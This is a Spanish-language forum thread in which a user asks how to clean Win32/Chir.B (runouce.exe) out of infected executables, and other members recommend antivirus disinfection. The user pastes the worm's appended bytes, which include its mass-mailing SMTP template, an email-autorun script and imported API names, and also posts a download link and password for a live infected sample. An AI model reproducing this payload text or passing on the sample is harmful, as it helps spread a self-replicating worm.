Autor
|
Tema: Modificar un archivo .exe para extraer algún virus y salvar el ejecutable (Leído 12,704 veces)
|
GenericCharacter
Desconectado
Mensajes: 5
|
Buenas tardes. Soy nuevo en este foro, así que no sé si es la categoría correcta para este hilo. Mi problema es que hace poco mi pc se infectó con un virus el cual daña los archivos .exe de todo el computador. Algunos de estos archivos aún se pueden ejecutar (pero ejecutando el virus en segundo plano) mientras que la gran mayoría terminaron dañados, dando dos errores diferentes. Una parte de los ejecutables infectados, sueltan un error APPCRASH al abrirlos, y se ejecutan dos veces (a pesar de que los abro una sola vez) mientras que otros sueltan un error que dice "*ruta del archivo* no es una aplicación Win32 válida". El objetivo del virus, supongo era ejecutar el archivo original y en segundo plano ejecutar el archivo infectado, quedando en segundo plano para infectar el resto del pc. Luego, me di cuenta que ejecutaba un archivo al iniciar el pc, llamado "runouce.exe" el cual se encontraba oculto en las carpetas SYSWow64 y System32. De este archivo me encargué, no borrándolo, sino creando un archivo del mismo nombre sin nada de contenido y sobreescribiéndolo por el virus, para luego, negar todos los permisos posibles de lectura/modificación (generando así, algún tipo de inmunidad). Sin embargo, mis archivos afectados seguían dañados, y si reinstalaba las aplicaciones afectadas, en el momento que sin querer, ejecutaba algo infectado, el proceso que se quedaba en segundo plano al dar error, volvía a infectar mi pc. Lo más simple sería formatear, pero debido a la gran cantidad de drivers, juegos y programas (instaladores .exe) afectados, y a lo remoto del sitio donde vivo (que el internet es malísimo) me resultaría realmente difícil recuperar todo. De manera que investigando todavía más, me di cuenta, que al abrir los archivos infectados, había una parte, que al compararlo con el mismo archivo sano, era nueva, texto o código agregado al final de todas las aplicaciones infectadas, una parte que era común denominador. Pensé que simplemente con el bloc de notas, la parte que el virus agregaba bastaría, pero da error y lanza que "La versión de este archivo no es compatible con la versión de Windows que está ejecutando etc, etc" un error distinto al que el virus agregaba. Luego probé ejecutar un juego infectado fuera de su carpeta, y para mí sorpresa, no ejecutaba el virus, daba un error ya que le faltaban dlls. Es decir, que en realidad, los ejecutables no están dañados, sino que simplemente, el virus fuerza a los programas a cerrar con un error. En conclusión, y si alguien ha llegado hasta aquí, me gustaría saber, así como el virus modificó los .exe sin dañarlos, el cómo podría quitar la parte del virus y así poder salvar los ejecutables. Estuve probando el PE Explorer pero en realidad, no sé cómo llegar a ese fragmento que el virus genera en todos los .exe. Investigando un poco más encontré la siguiente página que tiene más información específica (resultó ser exactamente el mismo virus): https://www.virusradar.com/en/Win32_Chir.B/description
|
|
« Última modificación: 23 Agosto 2023, 22:38 pm por GenericCharacter »
|
En línea
|
|
|
|
GenericCharacter
Desconectado
Mensajes: 5
|
Este sería el texto extraído en todos los .exe afectados: `èæ ‹t$ è ahŸ.B ÃéYè æ ðÿÿî f>MZuó·~<þ‹oxî‹] Þ3À‹ÖƒÃ@‹;úè GetProcAddress ^3ɱüó¦uÚ‹ò‹]$Þ·C‹]Þ‹‹Þìü ‹ü‰´$à è^ ‹éVÿÓü«‹Íâõ‹$è USER32.DLL ÿЋðèË ‹éVÿÓü«‹Íâõ‹$è ADVAPI32.DLL ÿЋðè ‹éVÿÓü«‹Íâõ‹$è MPR.DLL ÿЋðè\ ‹éVÿÓü«‹Íâõ‹$è WSOCK32.DLL ÿЋðè| ‹éVÿÓü«‹Íâõ‹ôè ChineseHacker-2 j j ÿVÿVÀtÌéÿVjPÿVèh ‹ôè ‹ôh`ê ÿVDëïéYè• è% ‚ ‰è B-‰èa èú B;‰èv èô ‚— ‰èÛ B-‰è0 èÉ B;‰èE ‹†è h`ê PÿVdƒøÿt\VèJ ^è; Net Send * My god! Some one killed ChineseHacker-2 Monitor Xj PÿVëœYèÉ èZ éè _‹†Œ ‰‡ý ‹†” ‰‡ ‹†˜ ‰‡& ‹FD‰‡f ‡¼ PTj PPj j ÿVt‹ØX‹†è h`ê PÿVdPj SÿVxXƒøÿtÌéVè ^ëÙYèM èÞ éYèA ì Tèì ‹üjWÿVpƒøÿt‹Øè… j j SÿV<Sèc ‹üjWÿV(PTè. SOFTWARE\Microsoft\Windows\CurrentVersion\Run h €ÿ– [‹Äè Runonce Yh Pjj QSÿ–¤ è _‹†¨ ‰‡„ ‹†¤ ‰‡® ‹†¬ ‰‡™ ‡] PTj SPj j ÿVtX3À‰†è ì Tè è _‹FP‰‡{ ‹Fd‰‡— ‹F‰‡² ‹FHÀtojj ÿЋ–à ·Z<Ú‹‹ ‹kT+Íù rHê—r jNURèd MN‹Ôh QRèP ÿVLPTj PUj j ÿV\‰†è Xhô ÿVDÌéj j ÿ–Œ PTPÿ–ˆ j hÿ ÿVPÀto‹Øj@h h j SÿVhÀtK‹è—r PTjNRUSÿVTXƒøNu,‹ÔMNPTh RQSÿVTÿVLTj PUj j SÿVX‰†è XSÿV`hô ÿVDÌéX‹Ìè GetSystemTime è GetComputerNameA è WideCharToMultiByte è TerminateThread è CreateThread è _lcreat è GetSystemDirectoryA è VirtualAllocEx è WaitForSingleObject è CloseHandle è CreateKernelThread è CreateRemoteThread è WriteProcessMemory è OpenProcess è GetCurrentProcessId è RegisterServiceProcess è Sleep è _lclose è _llseek è _lwrite è _lread è _lopen è SetFileTime è SetFileAttributesA è FindClose è FindNextFileA è FindFirstFileA è SetCurrentDirectoryA è GetDriveTypeA è WinExec è GetCommandLineA è GetLastError è CreateMutexA è LoadLibraryA +ÌÁéÿàéX‹Ìè wsprintfA è SendMessageA è GetWindow è MessageBoxA è FindWindowA è GetWindowThreadProcessId +ÌÁéÿàéX‹Ìè RegNotifyChangeKeyValue è RegQueryValueExA è RegSetValueExA è RegOpenKeyA +ÌÁéÿàéX‹Ìè WNetCloseEnum è WNetEnumResourceA è WNetOpenEnumA +ÌÁéÿàéX‹Ìè recv è closesocket è socket è connect è gethostbyname è htons è send è WSACleanup è WSAStartup +ÌÁéÿàéX‹Ìè ǹ±ÐÀîºéÖ¾! è È¥ËûèµÄ·¨Ö¹¦! è ·´¶Ôа½Ì,³çÉпÆÑ§! è ´òµ¹±¾ÀµÇ! è ÏòÓ¢ÐÛÍõΰÖÒâ! è ·´¶Ô°ÔȨÖ÷Òå! è ÊÀ½çÐèÒªºÍƽ! è Éç»áÖ÷ÒåºÃ! +ÌÿàéÈ `‹}h WÿVløè \runouce.exe ^¹ üó¤aÉ é¹ ºC:\ QRTÿVƒørƒøtTè¨ ZBYâåÃé3ÿè8 è) è è ‹GPè‚ ÃéWjè ÃéWjè ÃéWjè ÃéWjè ÃéÈ `PTÿuÿujjÿ–° [Àu6ì ‹Ôj‹Äh TRPSÿ–´ YYÀu‹üÿUëÞéSÿ–¸ Ä aÉ éÈ `‹E‹ =winntv=windtoÿuÿVÀteÿuèc ì Ç$*.* ‹ÄTPÿV‹Øƒøÿt1TSÿV Àt$T$,‹$ƒàt‹<.tåRè•ÿÿÿëÝéTè@ ëÔéSÿV$Ç$.. TÿVÄ aÉ éÈ `è aÉ éYè¥ è) ÿuÿÌéÈ `è aÉ éYèƒ è ÿuÿÌéè ça ZÃéè äa ZÃéÈ ‹E@€8 uú‹@ü É éÈ j ÿVDÉ éÈ ì TèÞýÿÿ‹üj WÿV0ƒøÿt@‹Ø¸ P‹ÄPWÿ–€ XÇÇ .emlÇ@ j WÿVpƒøÿt‹øWSj è• WÿV@SÿV@Ä É éÈ ‹}_,Sè`ÿÿÿ=.wabt!=.adct%=r.dbt=.doct=.xlstÉ éSè½ É éSè ì Tÿ–„ f‹D$Ä f= ujSÿV0ƒøÿt‹Øh4 TSÿV8SÿV@É éÈ ‹}_,SèÙþÿÿ=.exetS=.scrtL=.htmt=htmltÉ j SÿV(jSÿV0ƒøÿt‹ØSè\ GOWRQPSÿV,SÿV@_,ÿ7SÿV(É j SÿV(jSÿV0ƒøÿt‹ØSè GOWRQPSÿV,SÿV@_,ÿ7SÿV(É éÈ `ì TèIüÿÿ‹Äj PÿV0Ä ƒøÿ„Å ‹Øè readme.eml Xj PÿVpƒøÿ„Ÿ ‹øWSj è WÿV@‹}jj WÿV<èx <html><script language="javascript">window.open("readme.eml", null,"resizable=no,top=6000,left=6000")</script></html> XjxPWÿV8SÿV@aÉ éÈ `ì ‹üh WÿuÿV4·G<ø;ý‡Ô f?PE…É Ÿø ·OIƒÃ(âû;݇± ‹G(+Cr#Cj PÿuÿV<P‹ÄjPÿuÿV4Xf=`脆 K$ àjj ÿuÿV<ƒøÿtpPü +C‰C‹S;Âr‰C‹O8IÁÑ÷Ñ#Á#Ñ+GPY+KK‡O(O4è _ï# ‰ƒïhü WÿuÿV8ƒøÿtj j ÿuÿV<‹Äh PÿuÿV8Ä aÉ éÈ `ì TèOúÿÿ‹üj WÿV0ƒøÿt‹ØSÿuè× SÿV@Ä aÉ È `j ÿuÿV0ƒøÿ„‚ ‹Øì ‹ü3ÒRP‹ÄjPSÿV4YZÀt[‹ÄƒÀ ;øwâ€ù@tE€ù.t<€ù0r€ù9r8€ùAr€ù~r.3Àüª€þu»€úr¶+üƒÿr¯Š$<@t¨<.t¤TèHÿÿÿëœþëþÆŠÁüªë”SÿV@Ä aÉ È `j ÿuÿV0ƒøÿtp‹Øì ‹üh WSÿV4= uK‹G`j PSÿV<‹Odù w6QjDWSÿV4ì ‹Äj j h PjÿWh j ÿV|Tè¼þÿÿÄ YâÊÄ SÿV@aÉ È `‰eüì ‹üÿuWè PWÿuÿV8ì ‰$ì ‰$ì ‰$‹üh 0 WÿuÿV4ƒøÿtH‹Ôì ‰$ì ‰$ì ‰$ì ‰$‹üWPRè PWÿuÿV8Ç$
jWÿuÿV8‹eüa¸ É È `‰eüÇEø ì ‹üTh ÿ–¼ À…I j jjÿ–Ô ƒøÿ„. ‹ØfÇ jÿ–È f‰Gè btamail.net.cn ÿ–Ì À„ò ‹@‹ ‰GjWSÿ–Ð ƒøÿ„× ÿuWèæ j PWSÿ–Ä h ÿVDì ‰$ì ‰$ì ‰$‹üh 0 WÿuÿV4ƒøÿ„‰ ì ‰$ì ‰$ì ‰$ì ‰$‹ÔRPWèÕ ‹üj PWSÿ–Ä h ÿVDè . Xj jPSÿ–Ä h ÿVDè QUIT Xj jPSÿ–Ä h ÿVDÇEø Sÿ–Ø ÿ–À ‹eüa‹EøÉ È `¸ +à‹ÔPTRÿ–€ Xè HELO btamail.net.cn MAIL FROM: imissyou@btamail.net.cn RCPT TO: %s DATA FROM: %s@yahoo.com TO: %s SUBJECT: %s is comming! MIME-Version: 1.0 Content-type: multipart/mixed; boundary="#BOUNDARY#"
--#BOUNDARY# Content-Type: text/html Content-Transfer-Encoding: quoted-printable
<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>
--#BOUNDARY# MIME-Version: 1.0 Content-Type: audio/x-wav; name="pp.exe" Content-Transfer-Encoding: base64 Content-id: THE-CID
X‹üWÿuWÿuPÿuÿ–œ ‹ç‰EüÄ a‹EüÉ È `ÇEü èA ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ ^‹}‹UÁâ3Û3À¹ ÑàSÿuè0 Jt CâïŠüªÿEüëÞIÓàŠüªÿEüÑéMü°=üóª2Àªa‹EüÉ È QRV‹u‹M‹ÑÁêŠöÑ€áÒê€â ^ZYÉ XQè ë:édgÿ6 dg‰& è ÿ2‰"ÿàéXè ‹"dg YYÿàéè „Í( ZÃéÈ è èÑÿÿÿÿáéY‹E‰ˆ¸ 3ÀÉ èg MZP ÿÿ ¸ @ " º ´ Í!¸LÍ!This program must be run under Win32 $7 ˆPE L µ,ï‚ à Ž @ P 0 N @ SCODE `DATA @ À.idata 0 @ À.reloc @ @ P ÿ ÿ ÿ kÃÿ%00@ ÿ ÿ ÿ ý(0 80 00 F0 F0 KERNEL32.dll Sleep ÿ µ 0 ÿ ÿ ÿ ù _ŠG Àt P‹ÄjPSÿV8Xëì¶GãQP‹ÄjPSÿV8XYâñëÕÃéÈ ì 3ö‹üf¸ ¹ üóf«èöðÿÿ‹´áŠBüª Àu÷è ·¢ËÍÏûÏ¢ è óHwXj ÿÀtW‹Øè €'IwXjSÿÀtB‹Øè `Hw_ì Th j SÿÄ ÀuTh jSÿFƒæu Ä É è FºYwXhô ÿéQÿÿÿéÈ ‹]ì ‹üè Runonce ^h è #H(vXTWj j VSÿXè Ãà'vXj j jj Sÿè ã(vXh Wjj VSÿëÑéÈ è VvXÿuj hÿ ÿÀt,‹Øè 6vXjÿSÿè YƒÁè )2¥vXjQÿÉ éÈ `PL$þXƒÀ‹‹Pè `‰‰Püó¤aÏúf f@‹u‹}‹MÌûaÉ éÈ `‹Ej PPj ÿ– aÉ Ã
|
|
« Última modificación: 23 Agosto 2023, 22:10 pm por GenericCharacter »
|
En línea
|
|
|
|
crazykenny
|
Buenas tardes. Soy nuevo en este foro, así que no sé si es la categoría correcta para este hilo.
Mi problema es que hace poco mi pc se infectó con un virus el cual daña los archivos .exe de todo el computador. Algunos de estos archivos aún se pueden ejecutar (pero ejecutando el virus en segundo plano) mientras que la gran mayoría terminaron dañados, dando dos errores diferentes.
Una parte de los ejecutables infectados, sueltan un error APPCRASH al abrirlos, y se ejecutan dos veces (a pesar de que los abro una sola vez) mientras que otros sueltan un error que dice "*ruta del archivo* no es una aplicación Win32 válida". El objetivo del virus, supongo era ejecutar el archivo original y en segundo plano ejecutar el archivo infectado, quedando en segundo plano para infectar el resto del pc.
Luego, me di cuenta que ejecutaba un archivo al iniciar el pc, llamado "runouce.exe" el cual se encontraba oculto en las carpetas SYSWow64 y System32. De este archivo me encargué, no borrándolo, sino creando un archivo del mismo nombre sin nada de contenido y sobreescribiéndolo por el virus, para luego, negar todos los permisos posibles de lectura/modificación (generando así, algún tipo de inmunidad).
Sin embargo, mis archivos afectados seguían dañados, y si reinstalaba las aplicaciones afectadas, en el momento que sin querer, ejecutaba algo infectado, el proceso que se quedaba en segundo plano al dar error, volvía a infectar mi pc.
Lo más simple sería formatear, pero debido a la gran cantidad de drivers, juegos y programas (instaladores .exe) afectados, y a lo remoto del sitio donde vivo (que el internet es malísimo) me resultaría realmente difícil recuperar todo.
De manera que investigando todavía más, me di cuenta, que al abrir los archivos infectados, había una parte, que al compararlo con el mismo archivo sano, era nueva, texto o código agregado al final de todas las aplicaciones infectadas, una parte que era común denominador.
Pensé que simplemente con el bloc de notas, la parte que el virus agregaba bastaría, pero da error y lanza que "La versión de este archivo no es compatible con la versión de Windows que está ejecutando etc, etc" un error distinto al que el virus agregaba.
Luego probé ejecutar un juego infectado fuera de su carpeta, y para mí sorpresa, no ejecutaba el virus, daba un error ya que le faltaban dlls. Es decir, que en realidad, los ejecutables no están dañados, sino que simplemente, el virus fuerza a los programas a cerrar con un error.
En conclusión, y si alguien ha llegado hasta aquí, me gustaría saber, así como el virus modificó los .exe sin dañarlos, el cómo podría quitar la parte del virus y así poder salvar los ejecutables.
Estuve probando el PE Explorer pero en realidad, no sé cómo llegar a ese fragmento que el virus genera en todos los .exe.
Hola, GenericCharacter. ¿Has considerado la opcion de que el virus haya corrompido tu S.O. en lugar de archivos .exe y que, ademas, este forzando el error que comentas cuando intentas ejecutar aplicaciones .exe?. Y, bueno, aunque no tengo demasiada experiencia en el tema, lo comento como una sugerencia y porque es otra posibilidad que podrias revisar para, quizas, obtener mas información y intentar solucionar el problema. Lamento no poder ser de mas ayuda con respecto a la duda que has expuesto en este tema,,. Muchas gracias por vuestra atencion, y, bueno, saludos.,...
|
|
|
En línea
|
A nivel personal, lo que me da mas miedo no son los planteamientos y acciones individuales, sino las realizadas en grupo, ya que estas ultimas pueden acabar con consecuencias especialmente nefastas para todos. Se responsable, consecuente y da ejemplo. https://informaticayotrostemas.blogspot.com/Mi canal de Youtube: https://www.youtube.com
|
|
|
GenericCharacter
Desconectado
Mensajes: 5
|
Descuida, cualquier comentario o ayuda es bien recibido.
Y sobre si es un problema de S.O, pues no lo creo (al menos desde mi punto de vista, ya que no sé mucho sobre cómo funcionan los virus) pero al menos, aún hay programas que funcionan e incluso juegos (muy pocos, apenas 3 juegos de los 15 que tenía) pero analizando bien sus ejecutables, al parecer estaban infectados con otro virus diferente, virus que nunca le presté atención porque no provocaba nada ni ejecutaba nada, solo crea un archivo instalador con el mismo nombre con "mgr" añadido al final, y pues ya. Pero justos estos tres juegos tienen ese detalle, y son justo los que se salvaron.
También de la misma manera, las aplicaciones base del Windows, como el Media Player, Internet Explorer, bloc de notas y demáses, aún funcionan, osea, que nada en la carpeta de Windows fue realmente afectada (eso creo), solo las de archivos de programa y resto del pc.
Y gracias por tomarte la molestia de leer tan largo post, jaja.
|
|
|
En línea
|
|
|
|
**Aincrad**
|
sube alguna muestra, osea busca algun programa (que no pese mucho) que este infectado , lo comprimes con contraseña y lo subes a mediafire o mega.
|
|
|
En línea
|
|
|
|
GenericCharacter
Desconectado
Mensajes: 5
|
sube alguna muestra, osea busca algun programa (que no pese mucho) que este infectado , lo comprimes con contraseña y lo subes a mediafire o mega.
Disculpa la tardanza no tenía internet xd. Aquí está el enlace a un comprimido en mediafire: https://www.mediafire.com/file/0s08c8q19etltyp/VirusRunouce_%2528Infected%2526Original%2529.rar/file La contraseña es: 123456789 (si, es muy complicada) El comprimido contiene dos archivos, uno infectado y el otro no (para comparar su función original). El archivo infectado tiene en el nombre "(Infected)"
|
|
|
En línea
|
|
|
|
EdePC
|
Ese es un bicho bastante viejo y muy bien conocido. Cualquier antivirus decente incluyendo a Windows Defender suelen tener opciones como acciones que pueden realizar al encontrar malware: 1. Eliminar, simplemente elimina os archivos infectados 2. Poner en cuarentena, mueve el archivo infectado a una carpeta especial bajo el control del antivirus para mantenerlo ahí aislado por si el Usuario considera que es un archivo limpio (falso positivo) o desea mantener el archivo hasta encontrar otra solución 3. Desinfectar, cuando el antivirus conoce muy bien el tipo de infección y es capaz de remover la infección de un archivo para que se pueda seguir utilizando sin peligro, raras veces queda inutilizable, útil cuando no hay manera de encontrar un archivo original y limpio.  Ahí se puede ver que lo desinfectó, y por el análisis que le pude realizar si lo deja prácticamente igual al original Es raro infectarse con ese tipo de bichos tan antiguos y conocidos salvo que no tengas antivirus o lo hayas deshabilitado intencionalmente. Hacer la limpieza manualmente (sin antivirus) puede llegar a ser complejo dependiendo del malware porque podría no ser igual en los archivos infectados o tener más de una infección.
|
|
|
En línea
|
|
|
|
GenericCharacter
Desconectado
Mensajes: 5
|
Es raro infectarse con ese tipo de bichos tan antiguos y conocidos salvo que no tengas antivirus o lo hayas deshabilitado intencionalmente. Hacer la limpieza manualmente (sin antivirus) puede llegar a ser complejo dependiendo del malware porque podría no ser igual en los archivos infectados o tener más de una infección.
Ciertamente, yo tengo el Windows Defender desactivado y no tengo ningún antivirus instalado. Lo dejo así porque veo que consumen demasiados recursos de mi PC (que es bastante antigua y apenas tiene 2gb de RAM), y aunque si la escaneo periódicamente con AntiMalware Bytes, desconocía que el Defender podía restaurar los archivos. Muchas gracias por la ayuda, trataré de recuperarlos con algún antivirus y si no, pues tocará eliminarlos. ¡Saludos!
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
Extraer/modificar información de un ejecutable
Programación Visual Basic
|
aaronduran2
|
1
|
4,903
|
8 Noviembre 2008, 00:42 am
por seba123neo
|
|
|
Algun programa para extraer...
Juegos y Consolas
|
anonimo12121
|
1
|
4,543
|
21 Diciembre 2008, 14:12 pm
por Burnhack
|
|
|
algun sof para extraer audio de youtube para linux
Software
|
Paul Young
|
3
|
2,702
|
9 Marzo 2012, 16:08 pm
por jnego
|
|
|
Que debo modificar en el PE Header de un ejecutable para infectarlo????
Análisis y Diseño de Malware
|
harry_the_blogger
|
2
|
2,718
|
19 Agosto 2014, 00:45 am
por harry_the_blogger
|
|
|
Ejecutable con suid para ganar algún privilegio?
Hacking
|
l_s_h_s
|
2
|
4,704
|
27 Enero 2015, 13:58 pm
por l_s_h_s
|
|